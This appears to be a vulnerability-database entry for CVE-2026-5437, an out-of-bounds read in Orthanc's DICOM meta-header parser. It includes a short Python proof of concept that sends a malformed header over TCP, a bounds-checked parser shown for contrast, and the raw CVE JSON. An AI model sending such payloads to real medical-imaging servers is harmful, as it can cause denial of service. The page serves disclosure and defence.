Security Vulnerability Report
CVE-2026-5437 (CVSS 7.5, HIGH)

Published: 2026-04-09 15:16:15
Last Modified: 2026-04-15 19:14:32

Description

An out-of-bounds read vulnerability exists in `DicomStreamReader` during DICOM meta-header parsing. When processing malformed metadata structures, the parser may read beyond the bounds of the allocated metadata buffer. Although this issue does not typically crash the server or expose data directly to the attacker, it reflects insufficient input validation in the parsing logic.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:orthanc-server:orthanc:*:*:*:*:*:*:*:* - VULNERABLE
Orthanc Server (see the vendor's official security advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket

# Proof of Concept for CVE-2026-5437
# Attempts to trigger out-of-bounds read in DicomStreamReader
# Target: Orthanc Server (Default Port 4242)


def generate_malformed_dicom():
    # Standard DICOM preamble is 128 null bytes + 'DICM'
    # We modify the structure to potentially confuse the parser
    preamble = b'\x00' * 128
    prefix = b'DICM'
    # Malformed meta header length or group length to trigger OOB read
    # This is a simplified example; actual exploitation requires specific layout
    malformed_meta = b'\x02\x00\x00\x00' + b'\xFF\xFF\xFF\xFF'
    return preamble + prefix + malformed_meta


def send_exploit(host, port):
    payload = generate_malformed_dicom()
    try:
        print(f"[*] Sending payload to {host}:{port}")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.sendall(payload)
        s.close()
        print("[+] Payload sent successfully.")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    target_host = "127.0.0.1"
    target_port = 4242
    send_exploit(target_host, target_port)
```
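For contrast with the PoC, a bounds-checked parser for the DICOM File Meta Information group, added here as an illustration (it is neither Orthanc's `DicomStreamReader` nor code from the advisory): every length read from the untrusted stream is validated against the bytes that remain before it is used, so a header whose (0002,0000) group length claims 0xFFFFFFFF bytes is rejected rather than read past the buffer. The sample headers `GOOD` and `BAD` are constructed for this example, and the parser assumes Explicit VR Little Endian, the encoding DICOM Part 10 requires for this group.

```python
import struct

LONG_VRS = {b"OB", b"OW", b"OF", b"SQ", b"UN", b"UT"}  # VRs using the 4-byte length form

def parse_meta_header(data: bytes) -> dict:
    """Parse the DICOM File Meta Information group (0002,xxxx), Explicit VR Little
    Endian. Each untrusted length is checked against the remaining buffer before use."""
    if len(data) < 132 or data[128:132] != b"DICM":
        raise ValueError("missing 128-byte preamble or 'DICM' prefix")
    pos = 132
    # (0002,0000) UL group length: tag(4) + VR(2) + length(2) + value(4) = 12 bytes
    if len(data) - pos < 12 or struct.unpack_from("<HH2sH", data, pos) != (2, 0, b"UL", 4):
        raise ValueError("first element is not a well-formed (0002,0000) UL")
    group_len = struct.unpack_from("<I", data, pos + 8)[0]
    pos += 12
    end = pos + group_len
    if end > len(data):  # the declared group length must not extend past the buffer
        raise ValueError(f"group length {group_len} exceeds remaining {len(data) - pos} bytes")
    elements = {(2, 0): group_len}
    while pos < end:
        if end - pos < 8:
            raise ValueError("truncated element header")
        group, elem, vr, vlen = struct.unpack_from("<HH2sH", data, pos)
        pos += 8
        if vr in LONG_VRS:  # 2 reserved bytes were just consumed; a 4-byte length follows
            if end - pos < 4:
                raise ValueError("truncated 4-byte length field")
            vlen = struct.unpack_from("<I", data, pos)[0]
            pos += 4
        if vlen > end - pos:  # value would run past the declared group / buffer
            raise ValueError(f"element ({group:04x},{elem:04x}) length {vlen} out of bounds")
        elements[(group, elem)] = data[pos:pos + vlen]
        pos += vlen
    return elements

def is_well_formed(data: bytes) -> bool:
    try:
        parse_meta_header(data)
    except ValueError:
        return False
    return True

def _elem(group: int, elem: int, vr: bytes, value: bytes) -> bytes:  # one Explicit VR LE element
    return struct.pack("<HH2sH", group, elem, vr, len(value)) + value

PREFIX = b"\x00" * 128 + b"DICM"
_body = _elem(2, 0x0010, b"UI", b"1.2.840.10008.1.2.1\x00")  # Transfer Syntax UID, even-padded
GOOD = PREFIX + _elem(2, 0, b"UL", struct.pack("<I", len(_body))) + _body
BAD = PREFIX + _elem(2, 0, b"UL", b"\xff\xff\xff\xff")  # constructed: 0xFFFFFFFF group length
```

Parsing `GOOD` yields the Transfer Syntax UID; `BAD`, a truncated copy of `GOOD`, and a buffer with no `DICM` prefix are all refused before any out-of-range offset is touched.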

References

https://kb.cert.org/vuls/id/536588 (Third Party Advisory, VDB Entry)
https://www.machinespirits.de/ (Not Applicable)
https://www.orthanc-server.com/ (Product)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-5437",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-09T15:16:15.093",
    "lastModified": "2026-04-15T19:14:31.573",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An out-of-bounds read vulnerability exists in `DicomStreamReader` during DICOM meta-header parsing. When processing malformed metadata structures, the parser may read beyond the bounds of the allocated metadata buffer. Although this issue does not typically crash the server or expose data directly to the attacker, it reflects insufficient input validation in the parsing logic."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-125"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:orthanc-server:orthanc:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.12.11",
                "matchCriteriaId": "A259075D-8B77-4B04-BC42-3E5ABE9DFE1F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://kb.cert.org/vuls/id/536588",
        "source": "[email protected]",
        "tags": ["Third Party Advisory", "VDB Entry"]
      },
      {
        "url": "https://www.machinespirits.de/",
        "source": "[email protected]",
        "tags": ["Not Applicable"]
      },
      {
        "url": "https://www.orthanc-server.com/",
        "source": "[email protected]",
        "tags": ["Product"]
      }
    ]
  }
}
```